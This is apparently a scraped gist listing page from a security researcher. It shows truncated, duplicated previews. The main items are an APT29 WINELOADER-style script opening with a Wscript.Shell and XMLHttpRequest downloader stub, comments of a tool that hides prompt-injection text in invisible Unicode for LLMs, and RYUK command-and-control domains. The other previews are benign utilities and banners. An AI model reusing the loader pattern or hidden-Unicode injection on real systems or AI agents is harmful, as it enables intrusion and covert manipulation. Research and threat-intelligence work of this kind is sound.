Shadow0pz Shadow0ps

## APT29 WINELOADER SCRIPT.JS
// Create a new ActiveXObject for Wscript.Shell
var shell = new ActiveXObject("Wscript.Shell");

// Define the Main function with a parameter for the URL
function Main(url) {
  // Create a new XMLHttpRequest object
  var request = new XMLHttpRequest();

  // Define an event handler for when the request state changes
  request.onreadystatechange = function () {

## Unighost_Prompt_Injection.py
#This script helps generate unicode which is essentially hidden or "invisible" but is easily read by LLM's especially those that do not rely on a UI or Prescreening of prompts via API submission.
#This wont be published until someone else discovers it as its too "valuable" to threat actors to publish given currently available mitigations.
# V1.0: TLP RED! Do Not Distribute! Category: Hidden Injection Prompt! - 09/2023 - ShadowOpz
# V2.0: TLP RED! Feature update: Added invisible clipboard functionality.
# V3.0: Public Disclosure from Twitter discovered. Notes below.
# V3.0 Notes: Released to public Gist 01/12/2024 after public disclosure from Twitter.
# Kudos to @rezo_ and @goodside for the discovery and their pyperclip version.


## EOMTv2.2.ps1
<#
    MIT License

    Copyright (c) Microsoft Corporation.

    Permission is hereby granted, free of charge, to any person obtaining a copy
    of this software and associated documentation files (the "Software"), to deal
    in the Software without restriction, including without limitation the rights
    to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
    copies of the Software, and to permit persons to whom the Software is

## minecraftfinder.py
#Use Shodan Search API Query product:minecraft to return a list of minecraft servers and their details
#Example Output:
#Players: 0 online - 250 maximum
#Version: Paper 1.16.5 (protocol 754)
#Description: Welcome to USC FOP 2021's Minecraft Server!
#51.79.242.64
#['ovh.ca']
#Minecraft Server
#Don't forget to add your own Shodan API Key below first
#Usage is python3 minecraftfinder.py product:minecraft

## App Short URI OSX & IOS.txt
aam:
acrobat2018:
acrobat:
adbps:
addressbook:
adl:
aem-asset:
afp:
apconfig:
apple-reference-documentation:

## RYUK UNC1878
# C2 FQDNs
first seen fqdn
2019-12-11 23:37:10	updatemanagir.us
2019-12-20 17:51:05	cmdupdatewin.com
2019-12-26 18:03:27	scrservallinst.info
2020-01-10 00:33:57	winsystemupdate.com
2020-01-11 23:16:41	jomamba.best
2020-01-13 05:13:43	updatewinlsass.com
2020-01-16 11:38:53	winsysteminfo.com
2020-01-20 05:58:17	livecheckpointsrs.com

## NCMEC_REPORTER_PHOTODNA.PY
 #####  ####### #     # ######  ### ####### ### ####### #     #  #  ######  #          #     #####  #    #
#     # #     # ##    # #     #  #     #     #  #     # ##    # ### #     # #         # #   #     # #   #
#       #     # # #   # #     #  #     #     #  #     # # #   #  #  #     # #        #   #  #       #  #
#       #     # #  #  # #     #  #     #     #  #     # #  #  #     ######  #       #     # #       ###
#       #     # #   # # #     #  #     #     #  #     # #   # #  #  #     # #       ####### #       #  #
#     # #     # #    ## #     #  #     #     #  #     # #    ## ### #     # #       #     # #     # #   #
 #####  ####### #     # ######  ###    #    ### ####### #     #  #  ######  ####### #     #  #####  #    #

#     #  #####  #     # #######  #####     ######  ####### ######  ####### ######  ####### ####### ######
##    # #     # ##   ## #       #     #    #     # #

## hash160-to-base58.go
package main

import (
	"bufio"
	"encoding/hex"
	"fmt"
	"github.com/btcsuite/btcutil/base58"
	"log"
	"os"
)

## badkeyboard.js
//  ██████╗  █████╗ ██████╗ ██╗  ██╗███████╗██╗   ██╗██████╗  ██████╗  █████╗ ██████╗ ██████╗ ██╗
//  ██╔══██╗██╔══██╗██╔══██╗██║ ██╔╝██╔════╝╚██╗ ██╔╝██╔══██╗██╔═══██╗██╔══██╗██╔══██╗██╔══██╗██║
//  ██████╔╝███████║██║  ██║█████╔╝ █████╗   ╚████╔╝ ██████╔╝██║   ██║███████║██████╔╝██║  ██║██║
//  ██╔══██╗██╔══██║██║  ██║██╔═██╗ ██╔══╝    ╚██╔╝  ██╔══██╗██║   ██║██╔══██║██╔══██╗██║  ██║╚═╝
//  ██████╔╝██║  ██║██████╔╝██║  ██╗███████╗   ██║   ██████╔╝╚██████╔╝██║  ██║██║  ██║██████╔╝██╗
//  ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚═╝  ╚═╝╚══════╝   ╚═╝   ╚═════╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═════╝ ╚═╝
// No Donut!
// Built from code by : https://gist.github.com/jiaaro and a twitter post from: https://twitter.com/zackwhittaker/status/1084554101625626624
// Not for malicious use.  You assume all responsibility for anything you do with this.  Don't be a jerk.  If I find out you used this to hurt people.
// Just remember TAKEN.  Get what I'm sayin?

## update.sh
#!/usr/bin/env sh
## update.sh - manage a OpenWRT LetsEncrypt https instalation
# HOWTO:
# - put update.sh in its own directory (like /root/.https)
# - run ./update.sh your.domain.com (that domain needs to point to your router)
#  * this get an issued cert from letsencrypt.org using the webroot verification method
#  * also installs curl and ca-certificates packages
# - use crontab -e; add the line `0 0 * * * "/root/.https/update.sh" >>/root/.https/log.txt 2>&`
#  * this runs the update every day, logging everything to log.txt
#
	// Create a new ActiveXObject for Wscript.Shell
	var shell = new ActiveXObject("Wscript.Shell");

	// Define the Main function with a parameter for the URL
	function Main(url) {
	// Create a new XMLHttpRequest object
	var request = new XMLHttpRequest();

	// Define an event handler for when the request state changes
	request.onreadystatechange = function () {
	#This script helps generate unicode which is essentially hidden or "invisible" but is easily read by LLM's especially those that do not rely on a UI or Prescreening of prompts via API submission.
	#This wont be published until someone else discovers it as its too "valuable" to threat actors to publish given currently available mitigations.
	# V1.0: TLP RED! Do Not Distribute! Category: Hidden Injection Prompt! - 09/2023 - ShadowOpz
	# V2.0: TLP RED! Feature update: Added invisible clipboard functionality.
	# V3.0: Public Disclosure from Twitter discovered. Notes below.
	# V3.0 Notes: Released to public Gist 01/12/2024 after public disclosure from Twitter.
	# Kudos to @rezo_ and @goodside for the discovery and their pyperclip version.
	<#
	MIT License

	Copyright (c) Microsoft Corporation.

	Permission is hereby granted, free of charge, to any person obtaining a copy
	of this software and associated documentation files (the "Software"), to deal
	in the Software without restriction, including without limitation the rights
	to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
	copies of the Software, and to permit persons to whom the Software is
	#Use Shodan Search API Query product:minecraft to return a list of minecraft servers and their details
	#Example Output:
	#Players: 0 online - 250 maximum
	#Version: Paper 1.16.5 (protocol 754)
	#Description: Welcome to USC FOP 2021's Minecraft Server!
	#51.79.242.64
	#['ovh.ca']
	#Minecraft Server
	#Don't forget to add your own Shodan API Key below first
	#Usage is python3 minecraftfinder.py product:minecraft
	aam:
	acrobat2018:
	acrobat:
	adbps:
	addressbook:
	adl:
	aem-asset:
	afp:
	apconfig:
	apple-reference-documentation:
	# C2 FQDNs
	first seen fqdn
	2019-12-11 23:37:10 updatemanagir.us
	2019-12-20 17:51:05 cmdupdatewin.com
	2019-12-26 18:03:27 scrservallinst.info
	2020-01-10 00:33:57 winsystemupdate.com
	2020-01-11 23:16:41 jomamba.best
	2020-01-13 05:13:43 updatewinlsass.com
	2020-01-16 11:38:53 winsysteminfo.com
	2020-01-20 05:58:17 livecheckpointsrs.com
	##### ####### # # ###### ### ####### ### ####### # # # ###### # # ##### # #
	# # # # ## # # # # # # # # ## # ### # # # # # # # # #
	# # # # # # # # # # # # # # # # # # # # # # # # #
	# # # # # # # # # # # # # # # # ###### # # # # ###
	# # # # # # # # # # # # # # # # # # # # ####### # # #
	# # # # # ## # # # # # # # # ## ### # # # # # # # # #
	##### ####### # # ###### ### # ### ####### # # # ###### ####### # # ##### # #

	# # ##### # # ####### ##### ###### ####### ###### ####### ###### ####### ####### ######
	## # # # ## ## # # # # # #
	package main

	import (
	"bufio"
	"encoding/hex"
	"fmt"
	"github.com/btcsuite/btcutil/base58"
	"log"
	"os"
	)
	// ██████╗ █████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██████╗ ██████╗ █████╗ ██████╗ ██████╗ ██╗
	// ██╔══██╗██╔══██╗██╔══██╗██║ ██╔╝██╔════╝╚██╗ ██╔╝██╔══██╗██╔═══██╗██╔══██╗██╔══██╗██╔══██╗██║
	// ██████╔╝███████║██║ ██║█████╔╝ █████╗ ╚████╔╝ ██████╔╝██║ ██║███████║██████╔╝██║ ██║██║
	// ██╔══██╗██╔══██║██║ ██║██╔═██╗ ██╔══╝ ╚██╔╝ ██╔══██╗██║ ██║██╔══██║██╔══██╗██║ ██║╚═╝
	// ██████╔╝██║ ██║██████╔╝██║ ██╗███████╗ ██║ ██████╔╝╚██████╔╝██║ ██║██║ ██║██████╔╝██╗
	// ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ ╚═╝
	// No Donut!
	// Built from code by : https://gist.github.com/jiaaro and a twitter post from: https://twitter.com/zackwhittaker/status/1084554101625626624
	// Not for malicious use. You assume all responsibility for anything you do with this. Don't be a jerk. If I find out you used this to hurt people.
	// Just remember TAKEN. Get what I'm sayin?
	#!/usr/bin/env sh
	## update.sh - manage a OpenWRT LetsEncrypt https instalation
	# HOWTO:
	# - put update.sh in its own directory (like /root/.https)
	# - run ./update.sh your.domain.com (that domain needs to point to your router)
	# * this get an issued cert from letsencrypt.org using the webroot verification method
	# * also installs curl and ca-certificates packages
	# - use crontab -e; add the line `0 0 * * * "/root/.https/update.sh" >>/root/.https/log.txt 2>&`
	# * this runs the update every day, logging everything to log.txt
	#